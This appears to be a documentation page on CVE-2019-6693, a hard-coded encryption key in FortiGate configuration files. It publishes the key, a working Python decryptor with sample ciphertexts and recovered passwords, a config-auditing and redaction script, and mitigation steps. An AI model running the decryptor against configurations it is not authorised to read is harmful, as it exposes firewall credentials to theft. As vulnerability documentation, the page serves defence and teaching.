
Exploiting CVE-2019-6693

Overview

What is CVE-2019-6693?

CVE-2019-6693 is a vulnerability that allows an authorized user to reverse encrypted passwords on a FortiGate device from the configuration file.

The CVE was published on 11/21/2019 and has a base score of 6.5.

It is associated with CWE-798: Use of Hard-coded Credentials.

Explanation

The vulnerability is due to the use of a hard-coded encryption key in the FortiOS firmware. The key is used to encrypt passwords stored in the configuration file. An attacker with access to the configuration file can reverse the encrypted passwords using the hard-coded key.

The hard-coded key in question is the following 16-byte string: Mary had a littl

Exploitation

Exploitation requires access to the configuration file of the FortiGate device. The configuration file can be exported from the web UI, or printed in the CLI by running show (the full configuration) or show user local (only the local user section).

There are several scripts online to exploit this vulnerability, however, for the purpose of this documentation, we will use the following Python script:

cve-2019-6693.py
#!/usr/bin/env python3
import sys
import base64
from Crypto.Cipher import AES  # provided by the pycryptodome package

# Hard-coded key FortiOS uses to encrypt passwords in the configuration file
KEY = b'Mary had a littl'


def decrypt_password(encrypted_password):
    data = base64.b64decode(encrypted_password)
    # The first 4 bytes of the blob are the IV, zero-padded to the 16-byte AES
    # block size; the remainder is the AES-CBC ciphertext.
    iv = data[0:4] + b'\x00' * 12
    ct = data[4:]
    if len(ct) == 0 or len(ct) % AES.block_size != 0:
        raise ValueError("ciphertext length is not a multiple of 16 bytes")
    cipher = AES.new(KEY, AES.MODE_CBC, iv)
    pt = cipher.decrypt(ct)
    # The plaintext is NUL-padded; drop trailing NULs and any undecodable bytes
    return pt.decode(errors='ignore').rstrip('\x00')


def main():
    # Check if an argument was provided
    if len(sys.argv) < 2:
        print("Error: Please provide an encrypted password string.")
        print("Usage: ./cve-2019-6693.py <encrypted_password>")
        sys.exit(1)
    # Get the encrypted password from the command line
    encrypted_password = sys.argv[1]
    # Decrypt the password
    try:
        decrypted_password = decrypt_password(encrypted_password)
        print(f"Decrypted password: {decrypted_password}")
    except Exception as e:
        print(f"Error decrypting password: {e}")
        sys.exit(1)


if __name__ == "__main__":
    main()

This Python script is a modified version of the one in the saladandonionrings/cve-2019-6693 GitHub repository.

Usage

Ensure you have the pycryptodome library installed:

pip3 install pycryptodome

Mark the script as executable:

chmod +x cve-2019-6693.py

Run the script with the encrypted password as an argument:

./cve-2019-6693.py <encrypted_password>

Example:

$ ./cve-2019-6693.py LJZgRXgIhYYiLX7YjSDniG52S0K2AuZoVb+y15IIC5hkzONg
Decrypted password: test123_super_secret_password

$ ./cve-2019-6693.py uCn8uiVJqzzEm8iba4onCc98AJDiYggVSDlYIph+gjN3cjSSEvX8kSNfm+TjIzSlGnH5dm8rCd6aLgPipLPP2okahye7oZZxXfseBytbJ+7arJPz1e1mmnawL8/jFcl8g/SNNuSMo6q/f2Ilo7dnngJDZUfUeE2JiYpivmd5snDVadDoqOVRa8ji26I25r0IApELXg==
Decrypted password: guest)

Notes:

  • You may notice stray trailing characters in the decrypted password (the ")" after "guest" above). This is due to the padding used in the encryption process. You may need to validate the password yourself to ensure it is correct.
  • There is a web based decryption tool at the bottom of this page if you do not want to run the script locally.
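Because every ENC value in an exported configuration is either a one-way hash or a blob reversible with the key above, the safest habit is to audit and redact a config before it leaves the device. The following is an added example, not code from the original page or from the saladandonionrings repository: it scans a config export for "set <attribute> ENC <value>" lines, classifies each value as a hash (values beginning with "SH", an assumption about FortiOS's hash prefix), as a reversible blob (base64 that decodes to a 4-byte IV plus a whole number of AES blocks, the layout the script above relies on), or as unknown, and returns a scrubbed copy with every secret replaced by a placeholder. The sample configuration is constructed for illustration; the reversible blob in it is the first example value from this page, and the hash value is a placeholder.

```python
#!/usr/bin/env python3
"""Audit and scrub ENC secrets in a FortiGate configuration export.

Added example (not from the original page or the saladandonionrings
repository). Assumptions, constructed for illustration:
  * encrypted or hashed secrets appear on lines of the form
        set <attribute> ENC <value>
  * hashed admin passwords start with "SH"; any other ENC value that
    decodes to 4 IV bytes + n*16 bytes is treated as reversible.
"""
import base64
import re
import sys
from dataclasses import dataclass

ENC_LINE = re.compile(r'^(?P<indent>\s*)set (?P<attr>\S+) ENC (?P<value>\S+)\s*$')
IV_LEN = 4        # leading bytes of the blob used as the IV
AES_BLOCK = 16    # AES block size; CBC ciphertext is a multiple of this

# Constructed sample export; the passwd blob is the page's first example value
SAMPLE_CONFIG = """\
config system admin
    edit "admin"
        set password ENC SH2PLACEHOLDERHASHVALUEx1x2x3
    next
end
config user local
    edit "svc-backup"
        set type password
        set passwd ENC LJZgRXgIhYYiLX7YjSDniG52S0K2AuZoVb+y15IIC5hkzONg
    next
end
config system snmp community
    edit 1
        set name "public"
    next
end
"""


@dataclass
class Finding:
    line_no: int
    attr: str
    kind: str     # "hash" | "reversible" | "unknown"


def classify(value: str) -> str:
    """Classify an ENC value by its shape alone; nothing is decrypted."""
    if value.startswith("SH"):
        return "hash"
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return "unknown"
    body = len(raw) - IV_LEN
    if body > 0 and body % AES_BLOCK == 0:
        return "reversible"
    return "unknown"


def audit_config(text: str):
    """Return (findings, scrubbed_text) for a configuration export."""
    findings, scrubbed = [], []
    for n, line in enumerate(text.splitlines(), 1):
        m = ENC_LINE.match(line)
        if not m:
            scrubbed.append(line)
            continue
        findings.append(Finding(n, m.group("attr"), classify(m.group("value"))))
        scrubbed.append(f"{m.group('indent')}set {m.group('attr')} ENC <REDACTED>")
    return findings, "\n".join(scrubbed)


def summarize(findings):
    """Count findings per kind so a reviewer can see reversible secrets at a glance."""
    counts = {"hash": 0, "reversible": 0, "unknown": 0}
    for f in findings:
        counts[f.kind] += 1
    return counts


if __name__ == "__main__":
    # Usage: ./audit_fortigate_config.py [config.conf]; defaults to the sample
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CONFIG
    found, clean = audit_config(text)
    for f in found:
        print(f"line {f.line_no}: {f.attr} -> {f.kind}")
    print("summary:", summarize(found))
    print("--- scrubbed copy ---")
    print(clean)
```

Run against a real export with the file path as the only argument; the scrubbed copy is what goes into a ticket or a vendor case, and a non-zero "reversible" count is the signal that the export contains secrets recoverable by anyone who reads it.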

Mitigation

  • It is recommended you change the hard-coded encryption key in the FortiOS configuration file. This can be done by following the steps outlined in the Trusted platform module support article on the Fortinet website.
  • Ensure the FortiGate device is running the latest firmware to mitigate any other potential vulnerabilities.
  • Do not share your configuration file without scrubbing sensitive information such as passwords, regardless of whether they are encrypted or hashed.
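For the first mitigation, the setting that replaces the hard-coded key with a device-specific one is the private-data-encryption option. The following CLI fragment is an added example and not taken from the original page or from Fortinet's article; it assumes a FortiOS release that exposes this option under config system global (available from the 6.2 branch onward, to the author's knowledge), and the exact prompt text should be confirmed against the documentation for the firmware in use.

```text
# Added example: enable a device-specific encryption key for config secrets
config system global
    set private-data-encryption enable
end
# The CLI then prompts for a 32-character hexadecimal key; keep it in a
# password manager, because a backup encrypted with it cannot be restored
# to a device that does not hold the same key.
```

After enabling it, re-export the configuration and confirm with the auditing approach above that passwords previously reversible with the well-known key no longer decrypt with it.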

References and other information

Web Based Decryption Tool

Don’t want to run the script locally? You can use the web based decryption tool below:

CVE-2019-6693 Password Decryptor

Enter an encrypted FortiGate password to decrypt it using the known hard-coded key.

Warning: This tool is for educational purposes only. Always ensure you have proper authorization before attempting to decrypt passwords.

Note: This tool decrypts passwords locally, there is no data within this form that is transmitted to any server.